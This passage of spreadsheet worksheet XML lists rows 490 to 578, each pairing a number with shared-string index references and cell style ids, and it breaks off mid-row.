    <row r="490">
      <c r="A490" s="101">
        <v>2648.0</v>
      </c>
      <c r="B490" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C490" s="103" t="s">
        <v>2440</v>
      </c>
      <c r="D490" s="104" t="s">
        <v>3038</v>
      </c>
      <c r="E490" s="105" t="s">
        <v>3641</v>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="106">
        <v>3467.0</v>
      </c>
      <c r="B491" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C491" s="108" t="s">
        <v>2443</v>
      </c>
      <c r="D491" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E491" s="110" t="s">
        <v>3642</v>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="101">
        <v>3476.0</v>
      </c>
      <c r="B492" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C492" s="103" t="s">
        <v>2446</v>
      </c>
      <c r="D492" s="104" t="s">
        <v>3038</v>
      </c>
      <c r="E492" s="105" t="s">
        <v>3643</v>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="106">
        <v>4088.0</v>
      </c>
      <c r="B493" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C493" s="108" t="s">
        <v>2449</v>
      </c>
      <c r="D493" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E493" s="110" t="s">
        <v>3644</v>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="101">
        <v>4270.0</v>
      </c>
      <c r="B494" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C494" s="103" t="s">
        <v>2455</v>
      </c>
      <c r="D494" s="104" t="s">
        <v>3038</v>
      </c>
      <c r="E494" s="105" t="s">
        <v>3645</v>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="106">
        <v>5155.0</v>
      </c>
      <c r="B495" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C495" s="108" t="s">
        <v>2470</v>
      </c>
      <c r="D495" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E495" s="110" t="s">
        <v>3646</v>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="101">
        <v>5213.0</v>
      </c>
      <c r="B496" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C496" s="103" t="s">
        <v>2473</v>
      </c>
      <c r="D496" s="104" t="s">
        <v>3046</v>
      </c>
      <c r="E496" s="105" t="s">
        <v>3647</v>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="106">
        <v>5864.0</v>
      </c>
      <c r="B497" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C497" s="108" t="s">
        <v>2479</v>
      </c>
      <c r="D497" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E497" s="110" t="s">
        <v>3648</v>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="101">
        <v>6262.0</v>
      </c>
      <c r="B498" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C498" s="103" t="s">
        <v>2482</v>
      </c>
      <c r="D498" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E498" s="105" t="s">
        <v>3649</v>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="106">
        <v>6497.0</v>
      </c>
      <c r="B499" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C499" s="108" t="s">
        <v>2489</v>
      </c>
      <c r="D499" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E499" s="110" t="s">
        <v>3650</v>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="101">
        <v>6576.0</v>
      </c>
      <c r="B500" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C500" s="103" t="s">
        <v>2492</v>
      </c>
      <c r="D500" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E500" s="105" t="s">
        <v>3651</v>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="106">
        <v>3.0</v>
      </c>
      <c r="B501" s="107" t="s">
        <v>90</v>
      </c>
      <c r="C501" s="108" t="s">
        <v>2499</v>
      </c>
      <c r="D501" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E501" s="110" t="s">
        <v>3652</v>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="101">
        <v>355.0</v>
      </c>
      <c r="B502" s="102" t="s">
        <v>90</v>
      </c>
      <c r="C502" s="103" t="s">
        <v>2502</v>
      </c>
      <c r="D502" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E502" s="105" t="s">
        <v>3653</v>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="106">
        <v>19.0</v>
      </c>
      <c r="B503" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C503" s="108" t="s">
        <v>2508</v>
      </c>
      <c r="D503" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E503" s="110" t="s">
        <v>3654</v>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="101">
        <v>91.0</v>
      </c>
      <c r="B504" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C504" s="103" t="s">
        <v>2511</v>
      </c>
      <c r="D504" s="104" t="s">
        <v>3008</v>
      </c>
      <c r="E504" s="105" t="s">
        <v>3655</v>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="106">
        <v>95.0</v>
      </c>
      <c r="B505" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C505" s="108" t="s">
        <v>2514</v>
      </c>
      <c r="D505" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E505" s="110" t="s">
        <v>3656</v>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="101">
        <v>103.0</v>
      </c>
      <c r="B506" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C506" s="103" t="s">
        <v>2517</v>
      </c>
      <c r="D506" s="104" t="s">
        <v>3032</v>
      </c>
      <c r="E506" s="105" t="s">
        <v>3657</v>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="106">
        <v>135.0</v>
      </c>
      <c r="B507" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C507" s="108" t="s">
        <v>2520</v>
      </c>
      <c r="D507" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E507" s="110" t="s">
        <v>3658</v>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="101">
        <v>175.0</v>
      </c>
      <c r="B508" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C508" s="103" t="s">
        <v>2523</v>
      </c>
      <c r="D508" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E508" s="105" t="s">
        <v>3659</v>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="106">
        <v>177.0</v>
      </c>
      <c r="B509" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C509" s="108" t="s">
        <v>2526</v>
      </c>
      <c r="D509" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E509" s="110" t="s">
        <v>3660</v>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="101">
        <v>187.0</v>
      </c>
      <c r="B510" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C510" s="103" t="s">
        <v>2529</v>
      </c>
      <c r="D510" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E510" s="105" t="s">
        <v>3661</v>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="106">
        <v>190.0</v>
      </c>
      <c r="B511" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C511" s="108" t="s">
        <v>2532</v>
      </c>
      <c r="D511" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E511" s="110" t="s">
        <v>3662</v>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="101">
        <v>236.0</v>
      </c>
      <c r="B512" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C512" s="103" t="s">
        <v>2538</v>
      </c>
      <c r="D512" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E512" s="105" t="s">
        <v>3663</v>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="106">
        <v>242.0</v>
      </c>
      <c r="B513" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C513" s="108" t="s">
        <v>2541</v>
      </c>
      <c r="D513" s="109" t="s">
        <v>3008</v>
      </c>
      <c r="E513" s="110" t="s">
        <v>3664</v>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="101">
        <v>369.0</v>
      </c>
      <c r="B514" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C514" s="103" t="s">
        <v>2545</v>
      </c>
      <c r="D514" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E514" s="105" t="s">
        <v>3665</v>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="106">
        <v>387.0</v>
      </c>
      <c r="B515" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C515" s="108" t="s">
        <v>2548</v>
      </c>
      <c r="D515" s="109" t="s">
        <v>3024</v>
      </c>
      <c r="E515" s="110" t="s">
        <v>3666</v>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="101">
        <v>403.0</v>
      </c>
      <c r="B516" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C516" s="103" t="s">
        <v>2554</v>
      </c>
      <c r="D516" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E516" s="105" t="s">
        <v>3667</v>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="106">
        <v>410.0</v>
      </c>
      <c r="B517" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C517" s="108" t="s">
        <v>2557</v>
      </c>
      <c r="D517" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E517" s="110" t="s">
        <v>3668</v>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="101">
        <v>412.0</v>
      </c>
      <c r="B518" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C518" s="103" t="s">
        <v>2560</v>
      </c>
      <c r="D518" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E518" s="105" t="s">
        <v>3669</v>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="106">
        <v>466.0</v>
      </c>
      <c r="B519" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C519" s="108" t="s">
        <v>2571</v>
      </c>
      <c r="D519" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E519" s="110" t="s">
        <v>3670</v>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="101">
        <v>489.0</v>
      </c>
      <c r="B520" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C520" s="103" t="s">
        <v>2574</v>
      </c>
      <c r="D520" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E520" s="105" t="s">
        <v>3671</v>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="106">
        <v>493.0</v>
      </c>
      <c r="B521" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C521" s="108" t="s">
        <v>2578</v>
      </c>
      <c r="D521" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E521" s="110" t="s">
        <v>3672</v>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="101">
        <v>550.0</v>
      </c>
      <c r="B522" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C522" s="103" t="s">
        <v>2581</v>
      </c>
      <c r="D522" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E522" s="105" t="s">
        <v>3673</v>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="106">
        <v>630.0</v>
      </c>
      <c r="B523" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C523" s="108" t="s">
        <v>2584</v>
      </c>
      <c r="D523" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E523" s="110" t="s">
        <v>3674</v>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="101">
        <v>654.0</v>
      </c>
      <c r="B524" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C524" s="103" t="s">
        <v>2587</v>
      </c>
      <c r="D524" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E524" s="105" t="s">
        <v>3675</v>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="106">
        <v>657.0</v>
      </c>
      <c r="B525" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C525" s="108" t="s">
        <v>2590</v>
      </c>
      <c r="D525" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E525" s="110" t="s">
        <v>3676</v>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="101">
        <v>104.0</v>
      </c>
      <c r="B526" s="102" t="s">
        <v>94</v>
      </c>
      <c r="C526" s="103" t="s">
        <v>2593</v>
      </c>
      <c r="D526" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E526" s="105" t="s">
        <v>3677</v>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="106">
        <v>105.0</v>
      </c>
      <c r="B527" s="107" t="s">
        <v>94</v>
      </c>
      <c r="C527" s="108" t="s">
        <v>2596</v>
      </c>
      <c r="D527" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E527" s="110" t="s">
        <v>3678</v>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="101">
        <v>196.0</v>
      </c>
      <c r="B528" s="102" t="s">
        <v>94</v>
      </c>
      <c r="C528" s="103" t="s">
        <v>2603</v>
      </c>
      <c r="D528" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E528" s="105" t="s">
        <v>3679</v>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="106">
        <v>289.0</v>
      </c>
      <c r="B529" s="107" t="s">
        <v>94</v>
      </c>
      <c r="C529" s="108" t="s">
        <v>2616</v>
      </c>
      <c r="D529" s="109" t="s">
        <v>3032</v>
      </c>
      <c r="E529" s="110" t="s">
        <v>3680</v>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="101">
        <v>353.0</v>
      </c>
      <c r="B530" s="102" t="s">
        <v>94</v>
      </c>
      <c r="C530" s="103" t="s">
        <v>2621</v>
      </c>
      <c r="D530" s="104" t="s">
        <v>3042</v>
      </c>
      <c r="E530" s="105" t="s">
        <v>3681</v>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="106">
        <v>384.0</v>
      </c>
      <c r="B531" s="107" t="s">
        <v>94</v>
      </c>
      <c r="C531" s="108" t="s">
        <v>2624</v>
      </c>
      <c r="D531" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E531" s="110" t="s">
        <v>3682</v>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="101">
        <v>469.0</v>
      </c>
      <c r="B532" s="102" t="s">
        <v>94</v>
      </c>
      <c r="C532" s="103" t="s">
        <v>2627</v>
      </c>
      <c r="D532" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E532" s="105" t="s">
        <v>3683</v>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="106">
        <v>36.0</v>
      </c>
      <c r="B533" s="107" t="s">
        <v>96</v>
      </c>
      <c r="C533" s="108" t="s">
        <v>2629</v>
      </c>
      <c r="D533" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E533" s="110" t="s">
        <v>3684</v>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="101">
        <v>398.0</v>
      </c>
      <c r="B534" s="102" t="s">
        <v>96</v>
      </c>
      <c r="C534" s="103" t="s">
        <v>2632</v>
      </c>
      <c r="D534" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E534" s="105" t="s">
        <v>3685</v>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="106">
        <v>408.0</v>
      </c>
      <c r="B535" s="107" t="s">
        <v>96</v>
      </c>
      <c r="C535" s="108" t="s">
        <v>2635</v>
      </c>
      <c r="D535" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E535" s="110" t="s">
        <v>3686</v>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="101">
        <v>856.0</v>
      </c>
      <c r="B536" s="102" t="s">
        <v>96</v>
      </c>
      <c r="C536" s="103" t="s">
        <v>2638</v>
      </c>
      <c r="D536" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E536" s="105" t="s">
        <v>3687</v>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="106">
        <v>857.0</v>
      </c>
      <c r="B537" s="107" t="s">
        <v>96</v>
      </c>
      <c r="C537" s="108" t="s">
        <v>2641</v>
      </c>
      <c r="D537" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E537" s="110" t="s">
        <v>3688</v>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="101">
        <v>858.0</v>
      </c>
      <c r="B538" s="102" t="s">
        <v>96</v>
      </c>
      <c r="C538" s="103" t="s">
        <v>2644</v>
      </c>
      <c r="D538" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E538" s="105" t="s">
        <v>3689</v>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="106">
        <v>9.0</v>
      </c>
      <c r="B539" s="107" t="s">
        <v>98</v>
      </c>
      <c r="C539" s="108" t="s">
        <v>2650</v>
      </c>
      <c r="D539" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E539" s="110" t="s">
        <v>3690</v>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="101">
        <v>17.0</v>
      </c>
      <c r="B540" s="102" t="s">
        <v>98</v>
      </c>
      <c r="C540" s="103" t="s">
        <v>2653</v>
      </c>
      <c r="D540" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E540" s="105" t="s">
        <v>3691</v>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="106">
        <v>61.0</v>
      </c>
      <c r="B541" s="107" t="s">
        <v>98</v>
      </c>
      <c r="C541" s="108" t="s">
        <v>2656</v>
      </c>
      <c r="D541" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E541" s="110" t="s">
        <v>3692</v>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="101">
        <v>86.0</v>
      </c>
      <c r="B542" s="102" t="s">
        <v>98</v>
      </c>
      <c r="C542" s="103" t="s">
        <v>2659</v>
      </c>
      <c r="D542" s="104" t="s">
        <v>3015</v>
      </c>
      <c r="E542" s="105" t="s">
        <v>3693</v>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="106">
        <v>102.0</v>
      </c>
      <c r="B543" s="107" t="s">
        <v>98</v>
      </c>
      <c r="C543" s="108" t="s">
        <v>2662</v>
      </c>
      <c r="D543" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E543" s="110" t="s">
        <v>3694</v>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="101">
        <v>130.0</v>
      </c>
      <c r="B544" s="102" t="s">
        <v>98</v>
      </c>
      <c r="C544" s="103" t="s">
        <v>2665</v>
      </c>
      <c r="D544" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E544" s="105" t="s">
        <v>3695</v>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="106">
        <v>145.0</v>
      </c>
      <c r="B545" s="107" t="s">
        <v>98</v>
      </c>
      <c r="C545" s="108" t="s">
        <v>2668</v>
      </c>
      <c r="D545" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E545" s="110" t="s">
        <v>3696</v>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="101">
        <v>165.0</v>
      </c>
      <c r="B546" s="102" t="s">
        <v>98</v>
      </c>
      <c r="C546" s="103" t="s">
        <v>2671</v>
      </c>
      <c r="D546" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E546" s="105" t="s">
        <v>3697</v>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="106">
        <v>220.0</v>
      </c>
      <c r="B547" s="107" t="s">
        <v>98</v>
      </c>
      <c r="C547" s="108" t="s">
        <v>2674</v>
      </c>
      <c r="D547" s="109" t="s">
        <v>3015</v>
      </c>
      <c r="E547" s="110" t="s">
        <v>3698</v>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="101">
        <v>20271.0</v>
      </c>
      <c r="B548" s="102" t="s">
        <v>102</v>
      </c>
      <c r="C548" s="103" t="s">
        <v>2680</v>
      </c>
      <c r="D548" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E548" s="105" t="s">
        <v>3699</v>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="106">
        <v>20383.0</v>
      </c>
      <c r="B549" s="107" t="s">
        <v>102</v>
      </c>
      <c r="C549" s="108" t="s">
        <v>2683</v>
      </c>
      <c r="D549" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E549" s="110" t="s">
        <v>3700</v>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="101">
        <v>20509.0</v>
      </c>
      <c r="B550" s="102" t="s">
        <v>102</v>
      </c>
      <c r="C550" s="103" t="s">
        <v>2686</v>
      </c>
      <c r="D550" s="104" t="s">
        <v>3042</v>
      </c>
      <c r="E550" s="105" t="s">
        <v>3701</v>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="106">
        <v>21450.0</v>
      </c>
      <c r="B551" s="107" t="s">
        <v>102</v>
      </c>
      <c r="C551" s="108" t="s">
        <v>2692</v>
      </c>
      <c r="D551" s="109" t="s">
        <v>3008</v>
      </c>
      <c r="E551" s="110" t="s">
        <v>3702</v>
      </c>
    </row>
    <row r="552">
      <c r="A552" s="101">
        <v>21534.0</v>
      </c>
      <c r="B552" s="102" t="s">
        <v>102</v>
      </c>
      <c r="C552" s="103" t="s">
        <v>2695</v>
      </c>
      <c r="D552" s="104" t="s">
        <v>3038</v>
      </c>
      <c r="E552" s="105" t="s">
        <v>3703</v>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="106">
        <v>26882.0</v>
      </c>
      <c r="B553" s="107" t="s">
        <v>104</v>
      </c>
      <c r="C553" s="108" t="s">
        <v>2702</v>
      </c>
      <c r="D553" s="109" t="s">
        <v>3042</v>
      </c>
      <c r="E553" s="110" t="s">
        <v>3704</v>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="101">
        <v>11313.0</v>
      </c>
      <c r="B554" s="102" t="s">
        <v>106</v>
      </c>
      <c r="C554" s="103" t="s">
        <v>2705</v>
      </c>
      <c r="D554" s="104" t="s">
        <v>3015</v>
      </c>
      <c r="E554" s="105" t="s">
        <v>3705</v>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="106">
        <v>833.0</v>
      </c>
      <c r="B555" s="107" t="s">
        <v>108</v>
      </c>
      <c r="C555" s="108" t="s">
        <v>2713</v>
      </c>
      <c r="D555" s="109" t="s">
        <v>3001</v>
      </c>
      <c r="E555" s="110" t="s">
        <v>3706</v>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="101">
        <v>1422.0</v>
      </c>
      <c r="B556" s="102" t="s">
        <v>108</v>
      </c>
      <c r="C556" s="103" t="s">
        <v>2716</v>
      </c>
      <c r="D556" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E556" s="105" t="s">
        <v>3707</v>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="106">
        <v>1802.0</v>
      </c>
      <c r="B557" s="107" t="s">
        <v>108</v>
      </c>
      <c r="C557" s="108" t="s">
        <v>2719</v>
      </c>
      <c r="D557" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E557" s="110" t="s">
        <v>3708</v>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="101">
        <v>3520.0</v>
      </c>
      <c r="B558" s="102" t="s">
        <v>108</v>
      </c>
      <c r="C558" s="103" t="s">
        <v>2731</v>
      </c>
      <c r="D558" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E558" s="105" t="s">
        <v>3709</v>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="106">
        <v>1350.0</v>
      </c>
      <c r="B559" s="107" t="s">
        <v>110</v>
      </c>
      <c r="C559" s="108" t="s">
        <v>2770</v>
      </c>
      <c r="D559" s="109" t="s">
        <v>3015</v>
      </c>
      <c r="E559" s="110" t="s">
        <v>3710</v>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="101">
        <v>2092.0</v>
      </c>
      <c r="B560" s="102" t="s">
        <v>110</v>
      </c>
      <c r="C560" s="103" t="s">
        <v>2773</v>
      </c>
      <c r="D560" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E560" s="105" t="s">
        <v>3711</v>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="106">
        <v>2148.0</v>
      </c>
      <c r="B561" s="107" t="s">
        <v>110</v>
      </c>
      <c r="C561" s="108" t="s">
        <v>2776</v>
      </c>
      <c r="D561" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E561" s="110" t="s">
        <v>3712</v>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="101">
        <v>2375.0</v>
      </c>
      <c r="B562" s="102" t="s">
        <v>110</v>
      </c>
      <c r="C562" s="103" t="s">
        <v>2782</v>
      </c>
      <c r="D562" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E562" s="105" t="s">
        <v>3713</v>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="106">
        <v>2606.0</v>
      </c>
      <c r="B563" s="107" t="s">
        <v>110</v>
      </c>
      <c r="C563" s="108" t="s">
        <v>2785</v>
      </c>
      <c r="D563" s="109" t="s">
        <v>3001</v>
      </c>
      <c r="E563" s="110" t="s">
        <v>3714</v>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="101">
        <v>2901.0</v>
      </c>
      <c r="B564" s="102" t="s">
        <v>110</v>
      </c>
      <c r="C564" s="103" t="s">
        <v>2794</v>
      </c>
      <c r="D564" s="104" t="s">
        <v>3015</v>
      </c>
      <c r="E564" s="105" t="s">
        <v>3715</v>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="106">
        <v>3091.0</v>
      </c>
      <c r="B565" s="107" t="s">
        <v>110</v>
      </c>
      <c r="C565" s="108" t="s">
        <v>2800</v>
      </c>
      <c r="D565" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E565" s="110" t="s">
        <v>3716</v>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="101">
        <v>3539.0</v>
      </c>
      <c r="B566" s="102" t="s">
        <v>110</v>
      </c>
      <c r="C566" s="103" t="s">
        <v>2803</v>
      </c>
      <c r="D566" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E566" s="105" t="s">
        <v>3717</v>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="106">
        <v>5580.0</v>
      </c>
      <c r="B567" s="107" t="s">
        <v>110</v>
      </c>
      <c r="C567" s="108" t="s">
        <v>2809</v>
      </c>
      <c r="D567" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E567" s="110" t="s">
        <v>3718</v>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="101">
        <v>7283.0</v>
      </c>
      <c r="B568" s="102" t="s">
        <v>110</v>
      </c>
      <c r="C568" s="103" t="s">
        <v>2812</v>
      </c>
      <c r="D568" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E568" s="105" t="s">
        <v>3719</v>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="106">
        <v>9132.0</v>
      </c>
      <c r="B569" s="107" t="s">
        <v>110</v>
      </c>
      <c r="C569" s="108" t="s">
        <v>2815</v>
      </c>
      <c r="D569" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E569" s="110" t="s">
        <v>3720</v>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="101">
        <v>72.0</v>
      </c>
      <c r="B570" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C570" s="103" t="s">
        <v>2818</v>
      </c>
      <c r="D570" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E570" s="105" t="s">
        <v>3721</v>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="106">
        <v>90.0</v>
      </c>
      <c r="B571" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C571" s="108" t="s">
        <v>2821</v>
      </c>
      <c r="D571" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E571" s="110" t="s">
        <v>3722</v>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="101">
        <v>91.0</v>
      </c>
      <c r="B572" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C572" s="103" t="s">
        <v>2824</v>
      </c>
      <c r="D572" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E572" s="105" t="s">
        <v>3723</v>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="106">
        <v>164.0</v>
      </c>
      <c r="B573" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C573" s="108" t="s">
        <v>2827</v>
      </c>
      <c r="D573" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E573" s="110" t="s">
        <v>3724</v>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="101">
        <v>166.0</v>
      </c>
      <c r="B574" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C574" s="103" t="s">
        <v>2830</v>
      </c>
      <c r="D574" s="104" t="s">
        <v>3032</v>
      </c>
      <c r="E574" s="105" t="s">
        <v>3725</v>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="106">
        <v>221.0</v>
      </c>
      <c r="B575" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C575" s="108" t="s">
        <v>2833</v>
      </c>
      <c r="D575" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E575" s="110" t="s">
        <v>3726</v>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="101">
        <v>224.0</v>
      </c>
      <c r="B576" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C576" s="103" t="s">
        <v>2836</v>
      </c>
      <c r="D576" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E576" s="105" t="s">
        <v>3727</v>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="106">
        <v>228.0</v>
      </c>
      <c r="B577" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C577" s="108" t="s">
        <v>2839</v>
      </c>
      <c r="D577" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E577" s="110" t="s">
        <v>3728</v>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="101">
        <v>229.0</v>
      </c>
      <c r="B578" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C578" s="103" t="s">
        <v>2842</v>
